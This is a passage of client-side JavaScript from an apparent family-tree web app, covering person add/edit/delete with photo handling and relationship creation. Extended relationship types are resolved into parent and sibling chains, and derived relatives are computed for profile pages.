                // For Edit modal: clear the "removed" flag since the user is now
                // ADDING a photo, not removing.
                if (prefix === 'edit-person') {
                    const form = document.getElementById('edit-person-form');
                    if (form) delete form.dataset.photoRemoved;
                }
                // Hide the picker after selection.
                const picker = document.getElementById(pickerId);
                if (picker) picker.classList.add('hidden');
            } catch (err) {
                console.error('DiceBear avatar pick failed:', err);
                alert(`Could not load avatar: ${err.message}`);
            }
        }

        async function handleAddPerson(event) {
            console.log("=== handleAddPerson CALLED ===");
            console.log("Event:", event);

            event.preventDefault();
            console.log("Event prevented");

            // Get form elements from the event target (the form that was submitted)
            const form = event.target;
            console.log("Form element:", form);

            const errorDiv = document.getElementById('add-person-error');
            errorDiv.textContent = '';

            try {
                const firstName = form.querySelector('#person-first-name').value.trim();
                const lastName = form.querySelector('#person-last-name').value.trim();

                console.log("Form values captured - First Name:", firstName, "Last Name:", lastName);

                // Validate that at least one name is provided
                if (!firstName && !lastName) {
                    console.log("Validation failed: both names are empty");
                    throw new Error("Please provide at least a first name or last name.");
                }

                console.log("Validation passed!");

                // Combine birth place fields
                const birthCity = form.querySelector('#person-birth-city').value.trim();
                const birthState = form.querySelector('#person-birth-state').value.trim();
                const birthCountry = form.querySelector('#person-birth-country').value.trim();
                const birthPlaceParts = [birthCity, birthState, birthCountry].filter(Boolean);
                const birthPlace = birthPlaceParts.length > 0 ? birthPlaceParts.join(', ') : null;

                const personData = {
                    first_name: firstName || null,
                    last_name: lastName || null,
                    suffix: form.querySelector('#person-suffix').value || null,
                    gender: form.querySelector('#person-gender').value || null,
                    birth_year: form.querySelector('#person-birth-year').value ? parseInt(form.querySelector('#person-birth-year').value) : null,
                    birth_month: form.querySelector('#person-birth-month').value ? parseInt(form.querySelector('#person-birth-month').value) : null,
                    birth_day: form.querySelector('#person-birth-day').value ? parseInt(form.querySelector('#person-birth-day').value) : null,
                    birth_place: birthPlace,
                    birth_city: birthCity || null,
                    birth_state: birthState || null,
                    birth_country: birthCountry || null,
                    current_location: form.querySelector('#person-current-location').value.trim() || null,
                    occupation: form.querySelector('#person-occupation').value.trim() || null,
                    is_alive: form.querySelector('#person-is-alive').checked,
                    death_year: form.querySelector('#person-death-year').value ? parseInt(form.querySelector('#person-death-year').value) : null,
                    death_month: form.querySelector('#person-death-month').value ? parseInt(form.querySelector('#person-death-month').value) : null,
                    death_day: form.querySelector('#person-death-day').value ? parseInt(form.querySelector('#person-death-day').value) : null,
                    death_place: form.querySelector('#person-death-place').value.trim() || null,
                    email: form.querySelector('#person-email').value.trim() || null,
                    phone: form.querySelector('#person-phone').value.trim() || null,
                    bio: form.querySelector('#person-bio').value.trim() || null
                };

                console.log("Adding person with data:", personData);
                const result = await apiFetch(`${API_BASE_URL}/trees/${appState.currentTreeId}/person`, {
                    method: 'POST',
                    body: personData
                });
                console.log("Person added successfully:", result);

                // 2026-09-12: if a photo was picked, upload it now that we have the Person id.
                // Non-fatal — Person is already created; a failed photo upload just surfaces
                // an inline error and leaves the Person photo-less.
                const photoInput = form.querySelector('#person-photo-input');
                if (photoInput && photoInput.files && photoInput.files[0] && result && result.id) {
                    try {
                        await uploadPersonPhoto(appState.currentTreeId, result.id, photoInput.files[0]);
                    } catch (photoErr) {
                        console.error("Person photo upload failed:", photoErr);
                        alert(`Person added, but photo upload failed: ${photoErr.message}. You can retry from the Edit Person modal.`);
                    }
                }

                closeModal('add-person-modal');
                document.getElementById('add-person-form').reset();
                // 2026-09-12: form.reset() doesn't clear the photo preview DOM
                // (last-picked image ghosts into next open). Also clears the
                // DiceBear picker visibility and clear-btn state.
                _resetPersonPhotoPickerUI('person');
                // Scroll to top after closing modal
                window.scrollTo({ top: 0, behavior: 'smooth' });
                console.log("Reloading family tree data...");
                await loadFamilyTreeData(); // Reload the tree
                invalidateTimelineCache();
            } catch (error) {
                console.error("Error adding person:", error);
                errorDiv.textContent = error.message;
            }
        }

        async function handleEditPerson(event) {
            event.preventDefault();

            // Get form elements from the event target
            const form = event.target;
            const errorDiv = document.getElementById('edit-person-error');
            errorDiv.textContent = '';

            const personId = form.dataset.personId;

            try {
                const firstName = form.querySelector('#edit-person-first-name').value.trim();
                const lastName = form.querySelector('#edit-person-last-name').value.trim();

                // Validate that at least one name is provided
                if (!firstName && !lastName) {
                    throw new Error("Please provide at least a first name or last name.");
                }

                // Combine birth place fields
                const birthCity = form.querySelector('#edit-person-birth-city').value.trim();
                const birthState = form.querySelector('#edit-person-birth-state').value.trim();
                const birthCountry = form.querySelector('#edit-person-birth-country').value.trim();
                const birthPlaceParts = [birthCity, birthState, birthCountry].filter(Boolean);
                const birthPlace = birthPlaceParts.length > 0 ? birthPlaceParts.join(', ') : null;

                const personData = {
                    first_name: firstName || null,
                    last_name: lastName || null,
                    suffix: form.querySelector('#edit-person-suffix').value || null,
                    gender: form.querySelector('#edit-person-gender').value || null,
                    birth_year: form.querySelector('#edit-person-birth-year').value ? parseInt(form.querySelector('#edit-person-birth-year').value) : null,
                    birth_month: form.querySelector('#edit-person-birth-month').value ? parseInt(form.querySelector('#edit-person-birth-month').value) : null,
                    birth_day: form.querySelector('#edit-person-birth-day').value ? parseInt(form.querySelector('#edit-person-birth-day').value) : null,
                    birth_place: birthPlace,
                    birth_city: birthCity || null,
                    birth_state: birthState || null,
                    birth_country: birthCountry || null,
                    current_location: form.querySelector('#edit-person-current-location').value.trim() || null,
                    occupation: form.querySelector('#edit-person-occupation').value.trim() || null,
                    is_alive: form.querySelector('#edit-person-is-alive').checked,
                    death_year: form.querySelector('#edit-person-death-year').value ? parseInt(form.querySelector('#edit-person-death-year').value) : null,
                    death_month: form.querySelector('#edit-person-death-month').value ? parseInt(form.querySelector('#edit-person-death-month').value) : null,
                    death_day: form.querySelector('#edit-person-death-day').value ? parseInt(form.querySelector('#edit-person-death-day').value) : null,
                    death_place: form.querySelector('#edit-person-death-place').value.trim() || null,
                    email: form.querySelector('#edit-person-email').value.trim() || null,
                    phone: form.querySelector('#edit-person-phone').value.trim() || null,
                    bio: form.querySelector('#edit-person-bio').value.trim() || null
                };

                await apiFetch(`${API_BASE_URL}/trees/${appState.currentTreeId}/person/${personId}`, {
                    method: 'PUT',
                    body: personData
                });

                // 2026-09-12: photo upload/delete after PUT succeeds. Two exclusive branches:
                //  - Photo file picked → POST /photo (this also implicitly clears any existing photo
                //    since the endpoint replaces + deletes the prior blob).
                //  - Photo removed (data-photo-removed flag from clearPersonPhotoInput) → DELETE /photo.
                //  - Neither → no photo call.
                const photoInput = form.querySelector('#edit-person-photo-input');
                const photoRemoved = form.dataset.photoRemoved === '1';
                if (photoInput && photoInput.files && photoInput.files[0]) {
                    try {
                        await uploadPersonPhoto(appState.currentTreeId, personId, photoInput.files[0]);
                    } catch (photoErr) {
                        console.error("Person photo upload failed:", photoErr);
                        alert(`Profile updated, but photo upload failed: ${photoErr.message}`);
                    }
                } else if (photoRemoved) {
                    try {
                        await deletePersonPhoto(appState.currentTreeId, personId);
                    } catch (photoErr) {
                        console.error("Person photo delete failed:", photoErr);
                        alert(`Profile updated, but photo removal failed: ${photoErr.message}`);
                    }
                }

                closeModal('edit-person-modal');
                await loadFamilyTreeData(); // Reload the tree
                invalidateTimelineCache();
            } catch (error) {
                console.error("Error updating person:", error);
                errorDiv.textContent = error.message;
            }
        }

        // 2026-09-12: Entry point for the Delete Person button in EditPersonModal
        // footer. Reads personId from the form's data-person-id attribute and
        // resolves the current name from the live input values (which may reflect
        // an unsaved rename). Delegates to deletePerson for the confirm + DELETE.
        function deletePersonFromEdit() {
            const form = document.getElementById('edit-person-form');
            if (!form) return;
            const personIdRaw = form.dataset.personId;
            const personId = parseInt(personIdRaw, 10);
            if (!Number.isFinite(personId)) return;
            const firstName = (form.querySelector('#edit-person-first-name')?.value || '').trim();
            const lastName = (form.querySelector('#edit-person-last-name')?.value || '').trim();
            const displayName = `${firstName} ${lastName}`.trim() || 'this person';
            deletePerson(personId, displayName);
        }

        async function deletePerson(personId, personName) {
            if (!confirm(`Are you sure you want to delete ${personName}? This action cannot be undone.`)) {
                return;
            }

            try {
                await apiFetch(`${API_BASE_URL}/trees/${appState.currentTreeId}/person/${personId}`, {
                    method: 'DELETE'
                });

                // Close any open modals
                document.querySelectorAll('.modal-overlay').forEach(modal => {
                    closeModal(modal.id);
                });

                // Reload the tree and all views
                await loadFamilyTreeData();

                // Scroll to top so user can see the updated list
                window.scrollTo({ top: 0, behavior: 'smooth' });

                // Show success message
                alert(`${personName} has been removed from your family tree.`);
            } catch (error) {
                console.error("Error deleting person:", error);
                alert(`Could not delete ${personName}: ${error.message}`);
            }
        }

        // ---- Relationship Management Functions ----

        // Phase 2: optional prefill args {fromPersonId, toPersonId} let
        // callers open the modal pre-populated. The FTV "+ Connect to me"
        // affordance uses this with the viewer as source + the unconnected
        // Person as target.
        function openAddRelationshipModal(prefill) {
            const modal = document.getElementById('add-relationship-modal');
            if (!modal) {
                console.error("Add relationship modal not found");
                return;
            }

            // Get the persons from the current tree data
            const fromSelect = document.getElementById('relationship-from-person');
            const toSelect = document.getElementById('relationship-to-person');

            if (!fromSelect || !toSelect) {
                console.error("Relationship select elements not found");
                return;
            }

            // Clear existing options (except the first placeholder)
            fromSelect.innerHTML = '<option value="">Select person...</option>';
            toSelect.innerHTML = '<option value="">Select person...</option>';

            // Reset the conditional marriage-year row so re-opening the modal
            // after a SPOUSE_OF selection doesn't leave the field visible
            // with stale input.
            const marriageRow = document.getElementById('marriage-year-row');
            const marriageInput = document.getElementById('marriage-year');
            const typeSelect = document.getElementById('relationship-type');
            if (marriageRow) marriageRow.classList.add('hidden');
            if (marriageInput) marriageInput.value = '';
            if (typeSelect) typeSelect.value = '';

            // Populate with persons from current tree
            if (appState.treeData && appState.treeData.persons) {
                appState.treeData.persons.forEach(person => {
                    const firstName = (person.first_name || '').trim();
                    const lastName = (person.last_name || '').trim();
                    const displayName = firstName || lastName
                        ? `${firstName} ${lastName}`.trim()
                        : `Unnamed Person (ID: ${person.id})`;

                    fromSelect.innerHTML += `<option value="${person.id}">${displayName}</option>`;
                    toSelect.innerHTML += `<option value="${person.id}">${displayName}</option>`;
                });
            }

            // Phase 2: apply prefill if provided. Setting .value works after
            // the options were appended above.
            if (prefill) {
                if (prefill.fromPersonId != null) {
                    fromSelect.value = String(prefill.fromPersonId);
                }
                if (prefill.toPersonId != null) {
                    toSelect.value = String(prefill.toPersonId);
                }
            }

            // Open the modal using standard function
            openModal('add-relationship-modal');
        }

        // Toggle the optional marriage-year input on the Add Relationship modal.
        // Wired to #relationship-type's onchange. The field only makes sense
        // for SPOUSE_OF — for CHILD_OF / SIBLING_OF the year input would be
        // confusing (people don't have a single "year they became siblings").
        function toggleMarriageYearField() {
            const typeEl = document.getElementById('relationship-type');
            const rowEl = document.getElementById('marriage-year-row');
            if (!typeEl || !rowEl) return;
            if (typeEl.value === 'SPOUSE_OF') {
                rowEl.classList.remove('hidden');
            } else {
                rowEl.classList.add('hidden');
                const inputEl = document.getElementById('marriage-year');
                if (inputEl) inputEl.value = '';
            }
        }

        // Relationship-type semantics kept in sync with the backend's
        // add_relationship + _auto_create_invite_relationship logic
        // (routes/relationships.py + routes/invites.py). Used by the
        // client-side pre-check below to detect an already-existing
        // edge before POSTing — including the auto-mirrored side of
        // symmetric + inverse-pair types.
        const _REL_SYMMETRIC = new Set(['SPOUSE_OF', 'SIBLING_OF', 'COUSIN_OF']);
        const _REL_INVERSE_PAIR = {
            'AUNT_UNCLE_OF':   'NIECE_NEPHEW_OF',
            'NIECE_NEPHEW_OF': 'AUNT_UNCLE_OF',
            'GRANDPARENT_OF':  'GRANDCHILD_OF',
            'GRANDCHILD_OF':   'GRANDPARENT_OF',
        };
        function _humanRelName(type, from, to) {
            // Sentence-style rendering: "A is the {relationship} of B".
            // Used for the "already exists" prevention message so it
            // reads like the modal's own sentence copy.
            const namesFrom = ((from?.first_name || '') + ' ' + (from?.last_name || '')).trim() || 'that person';
            const namesTo = ((to?.first_name || '') + ' ' + (to?.last_name || '')).trim() || 'that person';
            const label = ({
                'CHILD_OF':        'child',
                'SPOUSE_OF':       'spouse',
                'SIBLING_OF':      'sibling',
                'COUSIN_OF':       'cousin',
                'AUNT_UNCLE_OF':   'aunt or uncle',
                'NIECE_NEPHEW_OF': 'niece or nephew',
                'GRANDPARENT_OF':  'grandparent',
                'GRANDCHILD_OF':   'grandchild',
            })[type] || type;
            return `${namesFrom} is already listed as the ${label} of ${namesTo}`;
        }

        // Return an existing relationship object from local treeData
        // that would match this add request — including auto-mirrored
        // pairs (symmetric same-type-reverse-direction; inverse-pair
        // opposite-type-reverse-direction). null if no clash.
        function _findExistingRelationship(fromId, toId, type) {
            const rels = appState?.treeData?.relationships || [];
            for (const r of rels) {
                const rf = r?.from?.id;
                const rt = r?.to?.id;
                const rType = r?.type;
                if (rf === fromId && rt === toId && rType === type) return r;
                if (_REL_SYMMETRIC.has(type) && rf === toId && rt === fromId && rType === type) return r;
                const pair = _REL_INVERSE_PAIR[type];
                if (pair && rf === toId && rt === fromId && rType === pair) return r;
            }
            return null;
        }

        // 2026-07-23 (derived-types cleanup — Chunk C): guided-chain
        // resolvers for extended types. Backend fb936fe rejects direct
        // GRANDPARENT_OF / GRANDCHILD_OF / AUNT_UNCLE_OF / NIECE_NEPHEW_OF /
        // COUSIN_OF writes with a 400. This layer intercepts before the
        // POST and converts the user's declared derived type into the
        // equivalent CHILD_OF (+ SIBLING_OF where needed) chain, offering
        // to create a placeholder mid-Person when the chain has a gap.
        //
        // Only grandparent / grandchild / aunt-uncle / niece-nephew have
        // a single-mid-person resolution. Cousin needs both persons'
        // parents recorded as siblings; the modal gates cousin with a
        // helper message pointing at that approach.
        function _peopleWhoAreParentsOf(personId, relationships) {
            const parents = [];
            for (const r of relationships) {
                const rt = r.type || r.relationship_type;
                if (rt !== 'CHILD_OF') continue;
                const fromId = r.from?.id || r.from_person_id;
                const toId = r.to?.id || r.to_person_id;
                if (fromId === personId) parents.push(toId);
            }
            return parents;
        }
        function _peopleWhoAreChildrenOf(personId, relationships) {
            const children = [];
            for (const r of relationships) {
                const rt = r.type || r.relationship_type;
                if (rt !== 'CHILD_OF') continue;
                const fromId = r.from?.id || r.from_person_id;
                const toId = r.to?.id || r.to_person_id;
                if (toId === personId) children.push(fromId);
            }
            return children;
        }
        async function _createPlaceholderPerson(sideLabel, lastNameHint) {
            // Placeholder mid-Person for the guided chain. sideLabel is
            // the human-friendly role tag ("Grandparent's child",
            // "Aunt/uncle's sibling") that renders as first_name so
            // the user can find + rename it later.
            const body = {
                first_name: sideLabel || 'Placeholder',
                last_name: lastNameHint || '',
                is_alive: true,
            };
            const result = await apiFetch(`${API_BASE_URL}/trees/${appState.currentTreeId}/person`, {
                method: 'POST',
                body,
            });
            return result?.id || result?.person?.id || null;
        }
        async function _createChildOfEdge(childId, parentId) {
            await apiFetch(`${API_BASE_URL}/trees/${appState.currentTreeId}/relationships`, {
                method: 'POST',
                body: {
                    from_person_id: childId,
                    to_person_id: parentId,
                    relationship_type: 'CHILD_OF',
                },
            });
        }
        async function _createSiblingOfEdge(aId, bId) {
            await apiFetch(`${API_BASE_URL}/trees/${appState.currentTreeId}/relationships`, {
                method: 'POST',
                body: {
                    from_person_id: aId,
                    to_person_id: bId,
                    relationship_type: 'SIBLING_OF',
                },
            });
        }

        // Guided-chain writer. Called from handleAddRelationship's
        // intercept branch below. Returns { ok, message } — ok=true when
        // the chain was written successfully (may have created a
        // placeholder mid-Person), ok=false when the user cancelled the
        // placeholder confirmation OR the case isn't supported (cousin).
        // The caller closes the modal + refreshes tree data when ok=true.
        async function _resolveGuidedChain(type, fromPersonId, toPersonId, relationships, persons) {
            const personById = new Map(persons.map(p => [p.id, p]));
            const fromP = personById.get(fromPersonId);
            const toP = personById.get(toPersonId);
            const nameOf = (p) => `${p?.first_name || ''} ${p?.last_name || ''}`.trim() || `Person ${p?.id}`;
            const lastNameOf = (p) => p?.last_name || '';
            const confirm = (msg) => window.confirm(msg);

            if (type === 'GRANDPARENT_OF') {
                // fromP is grandparent of toP → need mid: toP-[CHILD_OF]->mid-[CHILD_OF]->fromP.
                const parentsOfTo = _peopleWhoAreParentsOf(toPersonId, relationships);
                const childrenOfFrom = _peopleWhoAreChildrenOf(fromPersonId, relationships);
                const alreadyMid = parentsOfTo.find(pid => childrenOfFrom.includes(pid));
                if (alreadyMid) {
                    return { ok: true, message: `Chain already recorded — ${nameOf(fromP)} shows as a grandparent of ${nameOf(toP)} on the profile page.` };
                }
                // Prefer existing parent-of-to as mid (add missing edge only).
                if (parentsOfTo.length > 0) {
                    const midId = parentsOfTo[0];
                    const midName = nameOf(personById.get(midId));
                    if (!confirm(`Recording ${nameOf(fromP)} as grandparent of ${nameOf(toP)} through ${midName}. Continue?`)) {
                        return { ok: false, message: 'Cancelled.' };
                    }
                    await _createChildOfEdge(midId, fromPersonId);
                    return { ok: true, message: `Chain recorded via ${midName}.` };
                }
                if (childrenOfFrom.length > 0) {
                    const midId = childrenOfFrom[0];
                    const midName = nameOf(personById.get(midId));
                    if (!confirm(`Recording ${nameOf(fromP)} as grandparent of ${nameOf(toP)} through ${midName}. Continue?`)) {
                        return { ok: false, message: 'Cancelled.' };
                    }
                    await _createChildOfEdge(toPersonId, midId);
                    return { ok: true, message: `Chain recorded via ${midName}.` };
                }
                // Placeholder path — no mid known.
                if (!confirm(`You haven't added ${nameOf(toP)}'s parent yet. We'll add a placeholder parent (child of ${nameOf(fromP)}, parent of ${nameOf(toP)}) — you can fill in their details later. Continue?`)) {
                    return { ok: false, message: 'Cancelled.' };
                }
                const midId = await _createPlaceholderPerson('Parent of ' + (toP?.first_name || 'family member'), lastNameOf(fromP) || lastNameOf(toP));
                if (midId == null) return { ok: false, message: 'Could not create placeholder person.' };
                await _createChildOfEdge(midId, fromPersonId);
                await _createChildOfEdge(toPersonId, midId);
                return { ok: true, message: 'Placeholder mid-parent added. Tap the pencil on their card to fill in details.' };
            }
            if (type === 'GRANDCHILD_OF') {
                return _resolveGuidedChain('GRANDPARENT_OF', toPersonId, fromPersonId, relationships, persons);
            }
            if (type === 'AUNT_UNCLE_OF') {
                // fromP is aunt/uncle of toP → toP has a parent who is fromP's sibling.
                const parentsOfTo = _peopleWhoAreParentsOf(toPersonId, relationships);
                if (parentsOfTo.length > 0) {
                    const midId = parentsOfTo[0];
                    const midName = nameOf(personById.get(midId));
                    if (!confirm(`Recording ${nameOf(fromP)} as sibling of ${midName} (who is ${nameOf(toP)}'s parent). Continue?`)) {
                        return { ok: false, message: 'Cancelled.' };
                    }
                    await _createSiblingOfEdge(fromPersonId, midId);
                    return { ok: true, message: `Sibling link recorded via ${midName}. ${nameOf(fromP)} now shows as an aunt/uncle of ${nameOf(toP)}.` };
                }
                if (!confirm(`You haven't added ${nameOf(toP)}'s parent yet. We'll add a placeholder parent (sibling of ${nameOf(fromP)}, parent of ${nameOf(toP)}) — you can fill in their details later. Continue?`)) {
                    return { ok: false, message: 'Cancelled.' };
                }
                const midId = await _createPlaceholderPerson('Parent of ' + (toP?.first_name || 'family member'), lastNameOf(fromP) || lastNameOf(toP));
                if (midId == null) return { ok: false, message: 'Could not create placeholder person.' };
                await _createSiblingOfEdge(fromPersonId, midId);
                await _createChildOfEdge(toPersonId, midId);
                return { ok: true, message: 'Placeholder mid-parent added.' };
            }
            if (type === 'NIECE_NEPHEW_OF') {
                return _resolveGuidedChain('AUNT_UNCLE_OF', toPersonId, fromPersonId, relationships, persons);
            }
            if (type === 'COUSIN_OF') {
                // Cousin doesn't have a single-mid-Person resolution
                // (two mid-parents required, must be siblings). Rather
                // than dead-end with a wall of text, route the user
                // into the aunt/uncle flow: their cousin's parent IS
                // their aunt/uncle. Pre-fill the modal so they can
                // confirm without retyping. Once the aunt/uncle
                // relationship is recorded, the derived-buckets
                // helper surfaces the cousin automatically on both
                // profile pages.
                //
                // Confirmation copy: "To add a cousin, we'll add their
                // parent first (your aunt or uncle). Continue?" — one
                // click, then the guided aunt/uncle flow with fromP
                // (original inviter) as the aunt/uncle and toP's
                // parent as the mid target. On the aunt/uncle guided
                // side, if toP has no parents, the placeholder-parent
                // path kicks in.
                if (!confirm(`To add ${nameOf(fromP)} as ${nameOf(toP)}'s cousin, we'll set ${nameOf(fromP)}'s parent as ${nameOf(toP)}'s aunt or uncle. Continue?`)) {
                    return { ok: false, message: 'Cancelled.' };
                }
                // Find fromP's parents — one of them is toP's aunt/uncle.
                const parentsOfFrom = _peopleWhoAreParentsOf(fromPersonId, relationships);
                if (parentsOfFrom.length > 0) {
                    // Use the first parent as the aunt/uncle. In multi-
                    // parent cases we'd ideally ask which side, but
                    // window.confirm keeps the surface minimal.
                    const auntUncleId = parentsOfFrom[0];
                    return _resolveGuidedChain('AUNT_UNCLE_OF', auntUncleId, toPersonId, relationships, persons);
                }
                // fromP has no parents recorded → we need to place a
                // parent of fromP AND connect them as aunt/uncle to
                // toP. Two placeholders in one flow. Use the aunt/
                // uncle guided path with fromP as the target parent's
                // own child, letting that path create the placeholder.
                return {
                    ok: false,
                    message: `Add ${nameOf(fromP)}'s parent first (via Add Person + set them as ${nameOf(fromP)}'s parent). Then return here and pick Cousin — we'll set that parent as ${nameOf(toP)}'s aunt or uncle in one step.`,
                };
            }
            return { ok: false, message: 'Unsupported relationship type.' };
        }

        async function handleAddRelationship(event) {
            event.preventDefault();
            const form = event.target;
            const errorDiv = document.getElementById('add-relationship-error');
            const showError = (msg) => {
                if (errorDiv) {
                    errorDiv.textContent = msg;
                    errorDiv.classList.remove('hidden');
                }
            };
            const clearError = () => {
                if (errorDiv) {
                    errorDiv.textContent = '';
                    errorDiv.classList.add('hidden');
                }
            };
            clearError();

            try {
                const fromPersonId = parseInt(form.querySelector('#relationship-from-person').value);
                const toPersonId = parseInt(form.querySelector('#relationship-to-person').value);
                const relationshipType = form.querySelector('#relationship-type').value;

                if (!fromPersonId || !toPersonId || !relationshipType) {
                    throw new Error("Please fill in all fields");
                }
                if (fromPersonId === toPersonId) {
                    throw new Error("A person can't be in a relationship with themselves. Pick two different people.");
                }

                // Chunk C: intercept extended types and route through the
                // guided-chain resolver. Backend now rejects direct extended
                // writes; this converts to CHILD_OF + SIBLING_OF chains and
                // offers to create a placeholder mid-Person when the chain
                // has a gap.
                const EXTENDED_TYPES = new Set(['GRANDPARENT_OF', 'GRANDCHILD_OF', 'AUNT_UNCLE_OF', 'NIECE_NEPHEW_OF', 'COUSIN_OF']);
                if (EXTENDED_TYPES.has(relationshipType)) {
                    const rels = appState?.treeData?.relationships || [];
                    const persons = appState?.treeData?.persons || [];
                    const result = await _resolveGuidedChain(relationshipType, fromPersonId, toPersonId, rels, persons);
                    if (!result.ok) {
                        showError(result.message);
                        return;
                    }
                    closeModal('add-relationship-modal');
                    form.reset();
                    await loadFamilyTreeData();
                    if (appState.currentView === 'person-detail-view' && appState.currentPerson) {
                        renderPersonRelationships(appState.currentPerson.id);
                    }
                    if (typeof _ebwToast === 'function') _ebwToast(result.message);
                    return;
                }

                const relationshipData = {
                    from_person_id: fromPersonId,
                    to_person_id: toPersonId,
                    relationship_type: relationshipType,
                };

                if (relationshipType === 'SPOUSE_OF') {
                    const marriageYearRaw = form.querySelector('#marriage-year').value.trim();
                    if (marriageYearRaw) {
                        const y = parseInt(marriageYearRaw, 10);
                        const currentYear = new Date().getFullYear();
                        if (Number.isNaN(y) || y < 1800 || y > currentYear + 1) {
                            throw new Error(`Marriage year must be between 1800 and ${currentYear + 1}`);
                        }
                        relationshipData.marriage_year = y;
                    }
                }

                // Client-side dedupe pre-check. Catches the common case
                // where a relationship already exists in the tree data
                // — including auto-mirrored siblings-of/spouse-of, and
                // the auto-created edge from an invite accept (B41).
                // Better than round-tripping to the backend and coming
                // back with "already exists"; message names the exact
                // pair + relationship.
                const existing = _findExistingRelationship(fromPersonId, toPersonId, relationshipType);
                if (existing) {
                    showError(`${_humanRelName(relationshipType, existing.from, existing.to)}. If you don't see it on the tree, close this and reload the page.`);
                    return;
                }

                await apiFetch(`${API_BASE_URL}/trees/${appState.currentTreeId}/relationships`, {
                    method: 'POST',
                    body: relationshipData,
                });

                closeModal('add-relationship-modal');
                form.reset();
                await loadFamilyTreeData();

                if (appState.currentView === 'person-detail-view' && appState.currentPerson) {
                    renderPersonRelationships(appState.currentPerson.id);
                }

                if (typeof _ebwToast === 'function') {
                    _ebwToast('Relationship added');
                }
            } catch (error) {
                // Backend "already exists" → local treeData was stale.
                // Refresh + surface an actionable message that matches
                // reality (the edge IS in the graph; the user just
                // couldn't see it locally). Common cause: an invite
                // accept auto-created the edge but the FTV render is
                // showing the pre-accept snapshot.
                const msg = error?.message || '';
                if (/already exists/i.test(msg)) {
                    try { await loadFamilyTreeData(); } catch (_) {}
                    showError('This relationship is already recorded on the tree. It just refreshed — you can close this modal.');
                    return;
                }
                console.error('Add relationship failed:', error);
                showError(msg || 'Could not add the relationship. Try again in a moment.');
            }
        }

        async function deleteRelationship(relId, fromName, toName, relType) {
            console.log("=== DELETE RELATIONSHIP START ===");
            console.log("Relationship ID:", relId, "Type:", typeof relId);
            console.log("Tree ID:", appState.currentTreeId);
            console.log("From:", fromName, "To:", toName, "Type:", relType);

            const relTypeDisplay = relType === 'CHILD_OF' ? 'parent-child' :
                                   relType === 'SPOUSE_OF' ? 'spouse' :
                                   relType === 'SIBLING_OF' ? 'sibling' : relType;

            if (!confirm(`Are you sure you want to remove the ${relTypeDisplay} relationship between ${fromName} and ${toName}?`)) {
                console.log("User cancelled deletion");
                return;
            }

            try {
                const url = `${API_BASE_URL}/trees/${appState.currentTreeId}/relationships/${relId}`;
                console.log("DELETE URL:", url);

                const response = await apiFetch(url, {
                    method: 'DELETE'
                });

                console.log("DELETE successful, response:", response);

                await loadFamilyTreeData(); // Reload the tree
                invalidateTimelineCache();

                // If we're on the person detail view, refresh relationships for the current person
                if (appState.currentView === 'person-detail-view' && appState.currentPerson) {
                    renderPersonRelationships(appState.currentPerson.id);
                }

                console.log("=== DELETE RELATIONSHIP COMPLETE ===");
            } catch (error) {
                console.error("=== DELETE RELATIONSHIP ERROR ===");
                console.error("Error object:", error);
                console.error("Error message:", error.message);
                console.error("Error stack:", error.stack);
                alert(`Could not delete relationship: ${error.message}`);
            }
        }

        function openAddRelationshipModalForPerson(personId) {
            // First open the modal normally to populate it
            openAddRelationshipModal();

            // Then pre-select the person in the "from" field
            setTimeout(() => {
                const fromSelect = document.getElementById('relationship-from-person');
                if (fromSelect) {
                    fromSelect.value = personId;
                }
            }, 100);
        }

        // 2026-07-23 (derived-types cleanup — Chunk B): grandparent /
        // grandchild / aunt-uncle / niece-nephew / cousin buckets are
        // DERIVED from CHILD_OF + SPOUSE_OF chains for the profile page,
        // not read from direct edges. That means:
        //   grandparent = person's parent's parent (also via spouse of
        //                 parent's parent, i.e. step-grandparent)
        //   grandchild  = person's child's child
        //   aunt/uncle  = person's parent's sibling (also spouses of
        //                 those siblings — aunts/uncles by marriage)
        //   niece/nephew= person's sibling's child (also spouse's
        //                 sibling's child)
        //   cousin      = person's parent's sibling's child
        // Reason: the previous direct-edge approach produced the
        // grandfather-as-floater bug (unrenderable in FTV) + the double-
        // entry bug on the profile (inverse-pair auto-mirror wasn't
        // deduped in the bucketing). Deriving from chains guarantees
        // consistency with the FTV's own layout AND automatically dedupes
        // (a person appears in a bucket via SET membership, not per-edge).
        // Legacy direct edges (COUSIN_OF, AUNT_UNCLE_OF, NIECE_NEPHEW_OF,
        // GRANDPARENT_OF, GRANDCHILD_OF) are ignored here for display —
        // Chunk C's migration will convert resolvable ones to chains and
        // leave unresolvable ones for manual triage.
        function _computeDerivedRelationships(personId, persons, relationships) {
            const personById = new Map(persons.map(p => [p.id, p]));

            // Build lookup Maps for CHILD_OF and SPOUSE_OF.
            const parentsOf = new Map();   // childId -> Set of parentIds
            const childrenOf = new Map();  // parentId -> Set of childIds
            const spousesOf = new Map();   // personId -> Set of spouseIds
            for (const rel of relationships) {
                const type = rel.type || rel.relationship_type;
                const fromId = rel.from?.id || rel.from_person_id;
                const toId = rel.to?.id || rel.to_person_id;
                if (fromId == null || toId == null) continue;
                if (type === 'CHILD_OF') {
                    if (!parentsOf.has(fromId)) parentsOf.set(fromId, new Set());
                    parentsOf.get(fromId).add(toId);
                    if (!childrenOf.has(toId)) childrenOf.set(toId, new Set());
                    childrenOf.get(toId).add(fromId);
                } else if (type === 'SPOUSE_OF') {
                    if (!spousesOf.has(fromId)) spousesOf.set(fromId, new Set());
                    spousesOf.get(fromId).add(toId);
                    if (!spousesOf.has(toId)) spousesOf.set(toId, new Set());
                    spousesOf.get(toId).add(fromId);
                }
            }

            const parents = parentsOf.get(personId) || new Set();
            const children = childrenOf.get(personId) || new Set();
            const spouses = spousesOf.get(personId) || new Set();

            // Grandparents: parents of my parents + their spouses.
            const grandparents = new Set();
            for (const parentId of parents) {
                for (const gpId of (parentsOf.get(parentId) || [])) {
                    grandparents.add(gpId);
                    // Step-grandparents via spouse of grandparent.
                    for (const sp of (spousesOf.get(gpId) || [])) grandparents.add(sp);
                }
            }

            // Grandchildren: children of my children.
            const grandchildren = new Set();
            for (const childId of children) {
                for (const gcId of (childrenOf.get(childId) || [])) grandchildren.add(gcId);
            }

            // Siblings (derived): people who share a parent with me.
            // Not required for display (SIBLING_OF direct edges exist +
            // are consumed by the caller's direct-edge bucketing already)
            // but needed as an intermediate for aunts/uncles + cousins.
            const siblings = new Set();
            for (const parentId of parents) {
                for (const kidId of (childrenOf.get(parentId) || [])) {
                    if (kidId !== personId) siblings.add(kidId);
                }
            }
            // Also consume direct SIBLING_OF edges — half-siblings + step-
            // siblings a user typed in manually who don't share a parent
            // in the graph shouldn't get erased.
            for (const rel of relationships) {
